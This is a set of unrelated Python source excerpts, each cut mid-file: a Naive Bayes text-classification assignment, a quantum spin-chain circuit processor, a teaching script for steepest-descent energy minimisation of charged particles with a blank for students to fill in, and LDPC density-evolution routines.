t_w = [each_word for each_text in train_texts for each_word in each_text]
multiples = list(itertools.product(c_s.keys(), t_w))
t_sw = dict.fromkeys(multiples, 0)
for idx, label in enumerate(train_labels):
cur_text = train_texts[idx]
# compute c_s
c_s[label] += len(cur_text)
# compute c_sw
time_cnt = cur_text.count('time')
loss_cnt = cur_text.count('loss')
export_cnt = cur_text.count('export')
c_sw[(label, 'time')] += time_cnt
c_sw[(label, 'loss')] += loss_cnt
c_sw[(label, 'export')] += export_cnt
# compute t_sw (total occurances): of (label, word): occurances
for each_word in cur_text:
t_sw[(label, each_word)] += 1
# total # of distinct words: will be used for smoothing
t_dw = Counter(t_w)
if not silent:
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('s', 'cord', 'division', 'formation', 'phone', 'product', 'text')
print '------------------------------------------------------------------------------------------'
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('c(s)', c_s['cord'], c_s['division'], c_s['formation'], c_s['phone'], c_s['product'], c_s['text'])
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('c(s,time)', c_sw[('cord', 'time')], c_sw[('division', 'time')], c_sw[('formation', 'time')], \
c_sw[('phone', 'time')], c_sw[('product', 'time')], c_sw[('text', 'time')])
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('c(s,loss)', c_sw[('cord', 'loss')], c_sw[('division', 'loss')], c_sw[('formation', 'loss')], \
c_sw[('phone', 'loss')], c_sw[('product', 'loss')], c_sw[('text', 'loss')])
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('c(s,export)', c_sw[('cord', 'export')], c_sw[('division', 'export')], c_sw[('formation', 'export')], \
c_sw[('phone', 'export')], c_sw[('product', 'export')], c_sw[('text', 'export')])
print '------------------------------------------------------------------------------------------'
print ' total distinct words: %d ' % (len(t_dw.keys()))
# Part 2.2 (p_s/p_ws)
total_occurances = float(sum(c_s.values()))
label_count = Counter(train_labels)
p_s = {key: (value / float( sum( label_count.values() )) ) for key, value in label_count.iteritems()}
if improved:
p_ws = {key: ( (value + alpha) / \
(float(c_s[key[0]]) + alpha*len(t_dw.keys())) ) \
for key, value in c_sw.iteritems()}
t_ws = {key: ( (value + alpha) / \
(float(c_s[key[0]]) + alpha*len(t_dw.keys())) ) \
for key, value in t_sw.iteritems()}
else:
p_ws = {key: (value / float(c_s[key[0]])) for key, value in c_sw.iteritems()}
t_ws = {key: (value / float(c_s[key[0]])) for key, value in t_sw.iteritems()}
# normalization steps
norm_denominators = {
'time': 0.0,
'loss': 0.0,
'export': 0.0
}
for key, value in p_ws.iteritems():
norm_denominators[key[1]] += value
p_ws_norm = {key: (value / norm_denominators[key[1]]) for key, value in p_ws.iteritems()}
p_ws = p_ws_norm
if not silent:
print '------------------------------------------------------------------------------------------'
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('p(s)', p_s['cord'], p_s['division'], p_s['formation'], p_s['phone'], p_s['product'], p_s['text'])
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('p(time|s)', p_ws[('cord', 'time')], p_ws[('division', 'time')], p_ws[('formation', 'time')], \
p_ws[('phone', 'time')], p_ws[('product', 'time')], p_ws[('text', 'time')])
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('p(loss|s)', p_ws[('cord', 'loss')], p_ws[('division', 'loss')], p_ws[('formation', 'loss')], \
p_ws[('phone', 'loss')], p_ws[('product', 'loss')], p_ws[('text', 'loss')])
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('p(export|s)', p_ws[('cord', 'export')], p_ws[('division', 'export')], p_ws[('formation', 'export')], \
p_ws[('phone', 'export')], p_ws[('product', 'export')], p_ws[('text', 'export')])
# Part 2.3 (p_sxd, on the 1st line on test set)
p_sxd = dict.fromkeys(c_s.keys(), 0.0)
lp_sxd = dict.fromkeys(c_s.keys(), 0.0)
cur_text = dev_texts[0]
for key in p_sxd.keys():
# compute p for each class
if improved:
tp_sxd = p_s[key]
tlp_sxd = log(p_s[key])
else:
tp_sxd = p_s[key]
# compute for each word
for each_word in cur_text:
if t_ws.has_key((key, each_word)):
if improved:
tp_sxd *= t_ws[(key, each_word)]
tlp_sxd += log(t_ws[(key, each_word)])
else:
tp_sxd *= t_ws[(key, each_word)]
# add to the dict
if improved:
p_sxd[key] = tp_sxd
lp_sxd[key] = tlp_sxd
else:
p_sxd[key] = tp_sxd
if not silent:
print '------------------------------------------------------------------------------------------'
print ' %s | %s | %s | %s | %s | %s | %s |' % \
('p(s|X)', p_sxd['cord'], p_sxd['division'], p_sxd['formation'], \
p_sxd['phone'], p_sxd['product'], p_sxd['text'])
print '------------------------------------------------------------------------------------------'
print ' 1st label in dev : %s ' % (dev_labels[0])
print ' 1st text in dev[:5]: %s ' % (dev_texts[0][:5])
if improved:
print '------------------------------------------------------------------------------------------'
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('log(p(s|X))', lp_sxd['cord'], lp_sxd['division'], lp_sxd['formation'], \
lp_sxd['phone'], lp_sxd['product'], lp_sxd['text'])
# Part 2.4: compute all the prob on the test dataset
p_sx = list()
for idx, text in enumerate(test_texts):
| |
start + end - i])
i += 1
elif (end - start) < N - 1:
"""
If the resolving has to go backwards, the path is first
mapped to a separate circuit and then copied back to the
original circuit.
"""
temp = QubitCircuit(N - end + start)
i = 0
while i < (N - end + start):
if (N + start - end - i - i == 1 and
(N - end + start + 1) % 2 == 0):
if end == gate.controls[0]:
temp.add_gate(gate.name, targets=[i],
controls=[i + 1])
else:
temp.add_gate(gate.name, targets=[i + 1],
controls=[i])
elif (N + start - end - i - i == 2 and
(N - end + start + 1) % 2 == 1):
temp.add_gate("SWAP", targets=[i, i + 1])
if end == gate.controls[0]:
temp.add_gate(gate.name, targets=[i + 2],
controls=[i + 1])
else:
temp.add_gate(gate.name, targets=[i + 1],
controls=[i + 2])
temp.add_gate("SWAP", [i, i + 1])
i += 1
else:
temp.add_gate("SWAP", [i, i + 1])
temp.add_gate("SWAP",
[N + start - end - i - 1,
N + start - end - i])
i += 1
j = 0
for gate in temp.gates:
if (j < N - end - 2):
if gate.name in ["CNOT", "CSIGN"]:
qc_t.add_gate(gate.name, end + gate.targets[0],
end + gate.controls[0])
else:
qc_t.add_gate(gate.name,
[end + gate.targets[0],
end + gate.targets[1]])
elif (j == N - end - 2):
if gate.name in ["CNOT", "CSIGN"]:
qc_t.add_gate(gate.name, end + gate.targets[0],
(end + gate.controls[0]) % N)
else:
qc_t.add_gate(gate.name,
[end + gate.targets[0],
(end + gate.targets[1]) % N])
else:
if gate.name in ["CNOT", "CSIGN"]:
qc_t.add_gate(gate.name,
(end + gate.targets[0]) % N,
(end + gate.controls[0]) % N)
else:
qc_t.add_gate(gate.name,
[(end + gate.targets[0]) % N,
(end + gate.targets[1]) % N])
j = j + 1
elif (end - start) == N - 1:
qc_t.add_gate(gate.name, gate.targets, gate.controls)
elif gate.name in swap_gates:
start = min([gate.targets[0], gate.targets[1]])
end = max([gate.targets[0], gate.targets[1]])
if (setup == "linear" or
(setup == "circular" and (end - start) <= N // 2)):
i = start
while i < end:
if (start + end - i - i == 1 and
(end - start + 1) % 2 == 0):
qc_t.add_gate(gate.name, [i, i + 1])
elif ((start + end - i - i) == 2 and
(end - start + 1) % 2 == 1):
qc_t.add_gate("SWAP", [i, i + 1])
qc_t.add_gate(gate.name, [i + 1, i + 2])
qc_t.add_gate("SWAP", [i, i + 1])
i += 1
else:
qc_t.add_gate("SWAP", [i, i + 1])
qc_t.add_gate("SWAP", [start + end - i - 1,
start + end - i])
i += 1
else:
temp = QubitCircuit(N - end + start)
i = 0
while i < (N - end + start):
if (N + start - end - i - i == 1 and
(N - end + start + 1) % 2 == 0):
temp.add_gate(gate.name, [i, i + 1])
elif (N + start - end - i - i == 2 and
(N - end + start + 1) % 2 == 1):
temp.add_gate("SWAP", [i, i + 1])
temp.add_gate(gate.name, [i + 1, i + 2])
temp.add_gate("SWAP", [i, i + 1])
i += 1
else:
temp.add_gate("SWAP", [i, i + 1])
temp.add_gate("SWAP", [N + start - end - i - 1,
N + start - end - i])
i += 1
j = 0
for gate in temp.gates:
if(j < N - end - 2):
qc_t.add_gate(gate.name, [end + gate.targets[0],
end + gate.targets[1]])
elif(j == N - end - 2):
qc_t.add_gate(gate.name,
[end + gate.targets[0],
(end + gate.targets[1]) % N])
else:
qc_t.add_gate(gate.name,
[(end + gate.targets[0]) % N,
(end + gate.targets[1]) % N])
j = j + 1
else:
qc_t.add_gate(gate.name, gate.targets, gate.controls,
gate.arg_value, gate.arg_label)
return qc_t
def eliminate_auxillary_modes(self, U):
return U
def optimize_circuit(self, qc):
"""
Take a quantum circuit/algorithm and convert it into the
optimal form/basis for the desired physical system.
Parameters
----------
qc: :class:`.QubitCircuit`
Takes the quantum circuit to be implemented.
Returns
-------
qc: :class:`.QubitCircuit`
The circuit representation with elementary gates
that can be implemented in this model.
"""
self.qc0 = qc
self.qc1 = self.adjacent_gates(self.qc0)
self.qc2 = self.qc1.resolve_gates(
basis=["SQRTISWAP", "ISWAP", "RX", "RZ"])
return self.qc2
class LinearSpinChain(SpinChain):
"""
A processor based on the physical implementation of
a linear spin chain qubits system.
The available Hamiltonian of the system is predefined.
The processor can simulate the evolution under the given
control pulses either numerically or analytically.
Parameters
----------
N: int
The number of qubits in the system.
correct_global_phase: float
Save the global phase, the analytical solution
will track the global phase.
It has no effect on the numerical solution.
sx: int or list
The delta for each of the qubits in the system.
sz: int or list
The epsilon for each of the qubits in the system.
sxsy: int or list
The interaction strength for each of the qubit pair in the system.
t1: list or float, optional
Characterize the decoherence of amplitude damping for
each qubit.
t2: list of float, optional
Characterize the decoherence of dephasing for
each qubit.
"""
def __init__(self, N, correct_global_phase=True,
sx=0.25, sz=1.0, sxsy=0.1, t1=None, t2=None):
super(LinearSpinChain, self).__init__(
N, correct_global_phase=correct_global_phase,
sx=sx, sz=sz, sxsy=sxsy, t1=t1, t2=t2)
self.set_up_params(sx=sx, sz=sz, sxsy=sxsy)
self.set_up_ops(N)
def set_up_ops(self, N):
super(LinearSpinChain, self).set_up_ops(N)
def set_up_params(self, sx, sz, sxsy):
# Doc same as in the parent class
super(LinearSpinChain, self).set_up_params(sx, sz)
sxsy_para = 2 * np.pi * self.to_array(sxsy, self.N-1)
self._params["sxsy"] = sxsy_para
@property
def sxsy_ops(self):
return self.ctrls[2*self.N: 3*self.N-1]
@property
def sxsy_u(self):
return self.coeffs[2*self.N: 3*self.N-1]
def load_circuit(
self, qc, schedule_mode="ASAP", compiler=None):
return super(LinearSpinChain, self).load_circuit(
qc, "linear", schedule_mode=schedule_mode, compiler=compiler)
def get_operators_labels(self):
"""
Get the labels for each Hamiltonian.
It is used in the method``plot_pulses``.
It is a 2-d nested list, in the plot,
a different color will be used for each sublist.
"""
return ([[r"$\sigma_x^%d$" % n for n in range(self.N)],
[r"$\sigma_z^%d$" % n for n in range(self.N)],
[r"$\sigma_x^%d\sigma_x^{%d} + \sigma_y^%d\sigma_y^{%d}$"
% (n, n + 1, n, n + 1) for n in range(self.N - 1)],
])
def adjacent_gates(self, qc):
return super(LinearSpinChain, self).adjacent_gates(qc, "linear")
class CircularSpinChain(SpinChain):
"""
A processor based on the physical implementation of
a circular spin chain qubits system.
The available Hamiltonian of the system is predefined.
The processor can simulate the evolution under the given
control pulses either numerically or analytically.
Parameters
----------
N: int
The number of qubits in the system.
correct_global_phase: float
Save the global phase, the analytical solution
will track the global phase.
It has no effect on the numerical solution.
sx: int or list
The delta for each of the qubits in the system.
sz: int or list
The epsilon for each of the qubits in the system.
sxsy: int or list
The interaction strength for each of the qubit pair in the system.
t1: list or float, optional
Characterize the decoherence of amplitude damping for
each qubit.
t2: list of float, optional
Characterize the decoherence of dephasing for
each qubit.
"""
def __init__(self, N, correct_global_phase=True,
sx=0.25, sz=1.0, sxsy=0.1, t1=None, t2=None):
if N <= 1:
raise ValueError(
"Circuit spin chain must have at least 2 qubits. "
"The number of qubits is increased to 2.")
super(CircularSpinChain, self).__init__(
N, correct_global_phase=correct_global_phase,
sx=sx, sz=sz, sxsy=sxsy, t1=t1, t2=t2)
self.set_up_params(sx=sx, sz=sz, sxsy=sxsy)
self.set_up_ops(N)
def set_up_ops(self, N):
super(CircularSpinChain, self).set_up_ops(N)
operator = tensor([sigmax(), sigmax()]) + tensor([sigmay(), sigmay()])
self.pulses.append(
Pulse(operator, [N-1, 0], spline_kind=self.spline_kind))
self.pulse_dict["g" + str(N-1)] = len(self.pulses) - 1
def set_up_params(self, sx, sz, sxsy):
# Doc same as in the parent class
super(CircularSpinChain, self).set_up_params(sx, sz)
sxsy_para = 2 * np.pi * self.to_array(sxsy, self.N)
self._params["sxsy"] = sxsy_para
@property
def sxsy_ops(self):
return self.ctrls[2*self.N: 3*self.N]
@property
def sxsy_u(self):
return self.coeffs[2*self.N: 3*self.N]
def load_circuit(
self, qc, schedule_mode="ASAP", compiler=None):
return super(CircularSpinChain, self).load_circuit(
qc, "circular", schedule_mode=schedule_mode, compiler=compiler)
def get_operators_labels(self):
"""
Get the labels for each Hamiltonian.
It is used in the method``plot_pulses``.
It is a 2-d nested list, in the plot,
a different color will be used for each sublist.
"""
return ([[r"$\sigma_x^%d$" % n for n in range(self.N)],
[r"$\sigma_z^%d$" % n for n in range(self.N)],
[r"$\sigma_x^%d\sigma_x^{%d} + \sigma_y^%d\sigma_y^{%d}$"
| |
<reponame>haddocking/molmod-education<gh_stars>0
#!/usr/local/bin/python
#
###########################################################################
###########################################################################
# Simple EM of <NAME> charged or uncharges particles
# <NAME>, Utrecht University
#
# adapted from a script from <NAME>, Uni. Paris VI
#
###########################################################################
###########################################################################
##################
# import modules #
##################
from math import sqrt,exp,log,sin,cos
from random import random,randint,seed
###########################################################################
###########################################################################
### define parameters #####################################################
###########################################################################
###########################################################################
nAtoms = 20 # number of atoms
Radius = 25.0 # beware that Radius must be in a good range (according to nAtoms)
# in order to be able to place all atoms
Rmin = 2.24 * Radius # distance at which rmin is mini
BoxDim = [500,500] # box dimension
Atom_Coord = [] # list of the form : [NMAX][2]
Epsilon = 25.0 # well depth
Dielec = 1.0 # dielectric constant
qat = Radius # Atom absolute charge
frac_neg = 0.5 # Fraction negative charges
OverlapFr = 0.0 # fraction of overlap allowed
CutOff = 250 # non-bonded cutoff
CutOffSquare = CutOff**2
speed = 20 # canvas update speed
cstboltz = 0.00198722 # Boltzmann's constant in kcal/mol/K
cstboltz = 1000*cstboltz/4.18 #in J/mol/K
drinit = 1.00 # dr from EM
drmin = 0.00001 # minimum dr value to step EM
drmax = 5.00 # maximum dr
alpha = 1.05 # scaling factor for dr if Enew < Eold
beta = 0.90 # scaling factor for dr if Enew > Eold
deltaE = 0.001 # energy difference threshold to stop EM
normFmin = 0.001 # minimum force norm to step EM
Seed = 100 # random number seed
###########################################################################
###########################################################################
# Steepest descent minimizer ##############################################
###########################################################################
###########################################################################
def Steepest_descent(atom_coord,drstep,force):
#the first step for Verlet
list=[]
# This function gets as input parameters:
# - atom_coord, a vector containing the x and y position and the charge of the i atoms
# - drstep, the displacement for the minimizer
# - force, a vector containing the x and y components of the force on the atoms
#
# The function return a list array (vector containing the new positions)
#
# Implement in the following loop over all atoms the steepest descent algorithm
#
# A few hints:
# - powers in python are given by **, e.g.: x to the square is x**2
# - squared root x: sqrt(x)
# - avoid dividing by zero
#
# 1) First calculate the norm of the total force vector
#
normf = 0.0
for i in range(len(atom_coord)):
normf=normf+force[i][0]**2.0+force[i][1]**2.0
normf=sqrt(normf)
#
# 2) Then move the particles
#
for i in range(len(atom_coord)):
q=atom_coord[i][2]
r0x=atom_coord[i][0] #coordinates
r0y=atom_coord[i][1]
if (normf > 0):
#
# Insert below the lines defining the new coordinates based on the old ones + forces + drstep
#
# forces are contained in force[i][0] for the x force component and force[i][1] for the y force component
# the step size for the move is given by drstep
#
#
# ====>>>>>
r0xnew=r0x
r0ynew=r0y
# <<<<<====
r0x=r0xnew
r0y=r0ynew
list.append([r0x,r0y,q])
return list,normf
###########################################################################
###########################################################################
# move particules with EM ################################################
###########################################################################
###########################################################################
def Go(*args):
import sys,time
global Atom_Coord,Radius,BoxDim,Epsilon,Rmin,Cutoff,CutOffSquare,Iterations,Ene,Ene_prev,Accepted
global drstep,drmax,drmin,deltaE,hwtextene1,hwtextene2,alpha,beta,normFmin
global Color,sttext0,ptext2,paccept,Dielec,root,canevas,speed,nout
hwtextene1.destroy()
hwtextene2.destroy()
sttext0.destroy()
if Iterations==0:
nout = 0
drstep = drinit
Ene,EneLJ,EneCoul = Calc_Ene2(Atom_Coord,Epsilon,Rmin,Dielec,CutOffSquare,BoxDim)
Ene_prev=Ene
outtext="Iteration: %8d Epot: %6.1f Elj: %6.1f Ecoul: %6.1f" % (Iterations,Ene,EneLJ,EneCoul)
print(outtext)
nout = nout + 1
Force = Calc_Force2(Atom_Coord,Epsilon,Rmin,Dielec,CutOffSquare,BoxDim)
Atom_Coord, normF=Steepest_descent(Atom_Coord,drstep,Force)
Ene,EneLJ,EneCoul = Calc_Ene2(Atom_Coord,Epsilon,Rmin,Dielec,CutOffSquare,BoxDim)
Ene_diff= Ene - Ene_prev
if (Ene_diff < 0.0):
drstep = drstep * alpha
drstep = min(drmax,drstep)
else:
drstep = drstep * beta
Ene_prev=Ene
#update energies
mynewtext="step: %d" % (Iterations)
sttext0=Label(top1,text=mynewtext)
sttext0.pack(side='left')
mynewtext="Epot: %6.1f deltaE: %10.6f dr: %8.6f" % (Ene,Ene_diff,drstep)
hwtextene1=Label(top2,text=mynewtext)
hwtextene1.pack(side='left')
mynewtext="Elj: %6.1f Ecoul: %6.1f" % (EneLJ,EneCoul)
hwtextene2=Label(top3,text=mynewtext)
hwtextene2.pack(side='left')
#apply boudary conditions
for pp in range(len(Atom_Coord)):
for i in range(2): # i=0 -> case x coordinate ; i=1 -> case y coordinate
if Atom_Coord[pp][i] < 0:
Atom_Coord[pp][i] += BoxDim[i]
if Atom_Coord[pp][i] > BoxDim[i]:
Atom_Coord[pp][i] -= BoxDim[i]
#draw new canvas coordinates
for i in range(len(Atom_Coord)):
x1 = Atom_Coord[i][0] + Radius
y1 = Atom_Coord[i][1] + Radius
x2 = Atom_Coord[i][0] - Radius
y2 = Atom_Coord[i][1] - Radius
canevas.coords(ATOM[i],x1,y1,x2,y2)
Iterations=Iterations+1
#print to terminal window
normF = normF/len(Atom_Coord)
if nout == 20:
nout = 0
outtext="Iteration: %8d Epot: %6.1f Elj: %6.1f Ecoul: %6.1f deltaE: %10.6f <normF>: %8.6f dr: %8.6f" % (Iterations,Ene,EneLJ,EneCoul,Ene_diff,normF,drstep)
print(outtext)
if (abs(Ene_diff) < deltaE or drstep < drmin or normF < normFmin ):
print("STOPPING... deltaE<",deltaE,", or drstep<",drmin,", or normF<",normFmin)
outtext="Iteration: %8d Epot: %6.1f Elj: %6.1f Ecoul: %6.1f deltaE: %10.6f <normF>: %8.6f dr: %8.6f" % (Iterations,Ene,EneLJ,EneCoul,Ene_diff,normF,drstep)
print(outtext)
else:
canevas.after(speed,Go)
def reset(*args):
import sys,time
global Atom_Coord,ATOM,Radius,BoxDim,Epsilon,Rmin,Cutoff,CutOffSquare,Iterations,Ene,Ene_prev,Accepted
global drstep,drmax,drmin,deltaE,hwtextene1,hwtextene2,alpha,beta,normFmin
global Color,sttext0,ptext2,paccept,Dielec,root,canevas,speed,nout
hwtextene1.destroy()
hwtextene2.destroy()
sttext0.destroy()
canevas.destroy()
canevas = Canvas(root, width=BoxDim[0], height=BoxDim[1],bg="#ccddff")
canevas.bind("<Button-1>",Go)
Atom_Coord,ATOM,Color=setupall(Atom_Coord,ATOM,Color)
update_ene()
canevas.pack()
Iterations=0
###########################################################################
###########################################################################
### energy functions #####################################################
###########################################################################
###########################################################################
# calculate LJ from the squared distance
def LJ2(distsquare, epsilon, rmin_exp6):
Z = (1/distsquare)**3 * rmin_exp6
return epsilon * Z * (Z-1)
# classical Coulomb from the squared distance
def Coulomb2(r,dielec,qa,qb):
return qa*qb/(dielec*sqrt(r))
# Calculate energy Evdw + Ecoulomb (used squared distance)
# version with boundary conditions
def Calc_Ene2(coord,epsilon,rmin,dielec,cutoffsquare,boxdim,elec=1):
Ene = 0.0 ; distsquare = 0
ELJ = 0.0; ECoul=0.0
rmin_exp6 = rmin**6
# doubly nested loop over all particule pairs
for i in range(len(coord)-1):
for j in range(i+1,len(coord)):
# calculate the squared atomic distance
distsquare = 0
for k in range(2):
tmp = coord[j][k] - coord[i][k]
# chooses the nearest image
halfbox = boxdim[k]/2
tmp = tmp - SignR(halfbox,tmp-halfbox) - SignR(halfbox,tmp+halfbox)
distsquare += tmp**2
# compute vdw and Coulomb energy
if distsquare < cutoffsquare:
qa = coord[i][2]
qb = coord[j][2]
vdw = LJ2(distsquare, epsilon, rmin_exp6)
Ene += vdw
ELJ += vdw
if (elec):
CC = Coulomb2(distsquare,dielec,qa,qb)
Ene+=CC
ECoul+=CC
return Ene,ELJ,ECoul
###########################################################################
###########################################################################
### force functions ######################################################
###########################################################################
###########################################################################
# force LJ (use squared distance)
def ForceLJ2(distsquare, epsilon, rmin_exp6,xi):
rij=sqrt(distsquare)
Z = (1/distsquare)**3 * rmin_exp6
dedz=epsilon*(2*Z-1)
dzdr=rmin_exp6*(-6.0/rij**(7.0))
drdx=xi/rij
return dedz*dzdr*drdx
# Force Coulomb (use squared distance)
def ForceCoulomb2(distsquare,dielec,qa,qb,xi):
rij=sqrt(distsquare)
dedr=-1.0*(qa*qb/dielec)*(1/distsquare)
drdx=xi/rij
return dedr*drdx
# Calculate force from Evdw + Ecoulomb (uses squared distance)
def Calc_Force2(coord,epsilon,rmin,dielec,cutoffsquare,boxdim):
Force=[] ; distsquare = 0
rmin_exp6 = rmin**6
# doubly nested loop over all particle pairs
for i in range(len(coord)):
tmpforce=[0.0,0.0]
for j in range(len(coord)):
if not (i==j):
# calculate the squared atomic distance
distsquare = 0
for k in range(2):
tmp = coord[j][k] - coord[i][k]
# chooses the nearest image
halfbox = boxdim[k]/2
tmp = tmp - SignR(halfbox,tmp-halfbox) - SignR(halfbox,tmp+halfbox)
distsquare += tmp**2
# compute vdw force
if distsquare < cutoffsquare:
qa = coord[i][2]
qb = coord[j][2]
fflist=[]
for k in range(2):
tmp = coord[j][k] - coord[i][k]
ff = ForceLJ2(distsquare, epsilon, rmin_exp6,tmp)
ff += ForceCoulomb2(distsquare,dielec,qa,qb,tmp)
fflist.append(ff)
for k in range(2):
tmpforce[k]=tmpforce[k]+fflist[k]
Force.append(tmpforce)
return Force
###########################################################################
###########################################################################
### other functions ######################################################
###########################################################################
###########################################################################
### distance ###
def dist(A,B):
return sqrt((A[0]-B[0])**2+(A[1]-B[1])**2)
### squared distance ###
def dist2(A,B):
return (A[0]-B[0])**2+(A[1]-B[1])**2
### change sign ###
def SignR(a,b):
if b > 0:
return a
else:
return -a
### color particules based on charge ###
def charge_color(charge,qat):
tmp = "#111111"
if charge == qat:
tmp = "#FFFFFF"
else:
tmp = "#333333"
return tmp
def die(event=0):
import sys
sys.exit()
###########################################################################
###########################################################################
### initialization #######################################################
###########################################################################
###########################################################################
### generates random coordinates ###
def InitConf(n,dim,radius,qat,frac_neg):
seed(Seed)
print("Initializing box, please wait...")
# generate a list of random positions
tmp_coord = []
i = 0
nneg = 0
ntrial = 0
# fix first atom
x = random()*(dim[0]-2*radius)+radius#dim[0]
y = random()*(dim[1]-2*radius)+radius#dim[1]
nneg = int(float(n) * frac_neg)
npos = n - nneg
charge = -qat
if (npos == n): charge = qat
i += 1
if (n==2):
tmp_coord.append([175,300,charge])
else:
tmp_coord.append([x,y,charge])
while(i < nneg):
x = random()*(dim[0]-2*radius)+radius#dim[0]
y = random()*(dim[1]-2*radius)+radius#dim[1]
# check wether the new particule ovelap an existing one
OVERLAP = 1
for j in range(i):
if dist(tmp_coord[j],[x,y]) < (1-OverlapFr)*2*radius:
OVERLAP = 0
if OVERLAP:
charge = -qat
if (n==2):
tmp_coord.append([325,300,charge])
else:
tmp_coord.append([x,y,charge])
i += 1
ntrial = ntrial + 1
if ntrial > 100000:
print("initialisation failed")
print("==> reduce radius or number of atoms")
sys.exit()
while(i < n):
x = random()*(dim[0]-2*radius)+radius#dim[0]
y = random()*(dim[1]-2*radius)+radius#dim[1]
# check wether the new particule overlap an existing one
OVERLAP = 1
for j in range(i):
if dist(tmp_coord[j],[x,y]) < (1-OverlapFr)*2*radius:
OVERLAP = 0
if OVERLAP:
charge = qat
if (n==2):
tmp_coord.append([325,300,charge])
else:
tmp_coord.append([x,y,charge])
i += 1
ntrial = ntrial + 1
if ntrial > 10**10:
print("initialisation failed")
print("==> reduce radius or number of atoms")
sys.exit()
return tmp_coord
### generates random charges ###
def InitCharge(n,dim,qat,frac_neg):
global Atom_Coord
print("Initializing charges, please wait...")
i = 0
nneg = 0
nneg = int(float(n) * frac_neg)
npos = n - nneg
charge = -qat
if (npos == n): charge = qat
Atom_Coord[i][2]=charge
i += 1
while(i < nneg):
charge = -qat
Atom_Coord[i][2]=charge
i += 1
| |
<reponame>xianhegithub/opt_comms
import numpy as np
from scipy import stats
from scipy.special import comb
import mkl_fft
from numba import jit
"""
This is a set of functions that calculate the original density evolution for regular and
irregular LDPC code in AWGN channel.
"""
def de_reg_ldpc_awgn_orig(pc_0, itermax, m_sup, z_sup, pe_th, dv, dc):
"""
This function runs the original density evolution for regular LDPC code ensemble in AWGN channel.
Ref. [1] Channel Codes classical and modern - - <NAME> and <NAME> Algorithm 9.1 and Example 9.2
:param pc_0: pdf of the message from the channel
:param itermax: maximum number of iterations for the density evolution
:param m_sup: vector that generate the grid of m value, m stands for the message passed between nodes.
m_sup is of form [m_min, m_max, num_ele].
:param z_sup: vector that generate the grid of z value, z is the phi transform of m.
z_sup is of form [z_min, z_max, num_ele].
:param pe_th: the threshold of error probability
:param dv: variable node degree
:param dc: check node degree
:return pe_res: error probability at each iteration above the threshold
"""
pv = pc_0
ll = 0
pe_curr = 0.5
m_inc = (m_sup[1] - m_sup[0]) / (m_sup[2] - 1)
pe_res = np.zeros(itermax)
while ll < itermax and pe_curr > pe_th:
pe_res[ll] = pe_curr
ll = ll + 1
pc = cn_update(m_sup, pv, dc - 1, z_sup)
pv = vn_update(pc_0, pc, dv - 1, m_sup, m_sup)
pe_curr = pv[:int((m_sup[2] - 1) / 2 + 1 + 0.5)].sum() * m_inc
print(pe_curr)
pe_res[ll] = pe_curr
return pe_res[:ll+1]
def de_irreg_ldpc_awgn_orig(pc_0, itermax, m_sup, z_sup, pe_th, lmbda, rho):
pv_aver = pc_0
ll = 0
pe_curr = 0.5
m_inc = (m_sup[1] - m_sup[0])/(m_sup[2] - 1)
pe_res = np.zeros(itermax)
max_dv = len(lmbda)
max_dc = len(rho)
while ll < itermax and pe_curr > pe_th:
pe_res[ll] = pe_curr
ll = ll + 1
pc_aver = np.zeros(len(pc_0))
for idx in range(1, max_dc):
if rho[idx] != 0:
pc = cn_update(m_sup, pv_aver, idx, z_sup)
pc_aver = pc_aver + rho[idx] * pc
pv_aver = np.zeros(len(pc_0))
for idx in range(1, max_dv):
if lmbda[idx] != 0:
pv = vn_update(pc_0, pc_aver, idx, m_sup, m_sup)
pv_aver = pv_aver + lmbda[idx] * pv
pe_curr = pv_aver[:int((m_sup[2] - 1) / 2 + 1 + 0.5)].sum() * m_inc
print(pe_curr)
return pe_res
def ch_msg(m_sup, sigma):
"""
channel output signal is of 'distribution is N(2/sigma^2,4/sigma^2)
Ref. [1] Channel Codes classical and modern -- <NAME> and <NAME>
page 394, example 9.2
"""
mu_ch = 2/(sigma ** 2)
var_ch_sqrt = 2/sigma
m_inc = (m_sup[1] - m_sup[0])/(m_sup[2] - 1)
m_grid = np.linspace(m_sup[0], m_sup[1], m_sup[2])
pc0 = stats.norm.pdf(m_grid, mu_ch, var_ch_sqrt)
return pc0, m_grid
def cn_update(m_sup, pv, dcm1, z_sup):
"""
This function updates the check nodes pdf in density evolution.
:param m_sup: vector that generate the grid of m value, m stands for the message passed between nodes.
m_sup is of form [m_min, m_max, num_ele].
:param pv: pdf of variable check nodes
:param dcm1: check node degree minus 1, i.e., dc - 1
:param z_sup: vector that generate the grid of z value, z is the phi transform of m.
z_sup is of form [z_min, z_max, num_ele].
:return pm_update: p^{(c)} in Algorithm 9.1 step 3 [1]
Ref. [1] Channel Codes classical and modern - - <NAME> and <NAME> Algorithm 9.1 step 3
"""
m_inc = (m_sup[1] - m_sup[0]) / (m_sup[2] - 1)
z_inc = (z_sup[1] - z_sup[0]) / (z_sup[2] - 1)
p0_zi, p1_zi, excess = phi_trans(m_sup, pv, z_sup)
# the probability density of pv(0) is not handled in the above transform,
# but separately in the each step followed.
p_zero = pv[int((m_sup[2] - 1) / 2 + 0.5)] * m_inc
# z_uni_extn contains the new bins for the convolved function, because
# convolution will expand the support of the pdf, unavoidably
z_extn_sup = [z_sup[0]*dcm1, z_sup[0]*dcm1 + z_inc*z_sup[2]*dcm1, z_sup[2]*dcm1 + 1]
pomg_pos, pomg_neg, p_res_zero = cn_fft_convolve(p0_zi, p1_zi, dcm1, z_extn_sup, excess, p_zero)
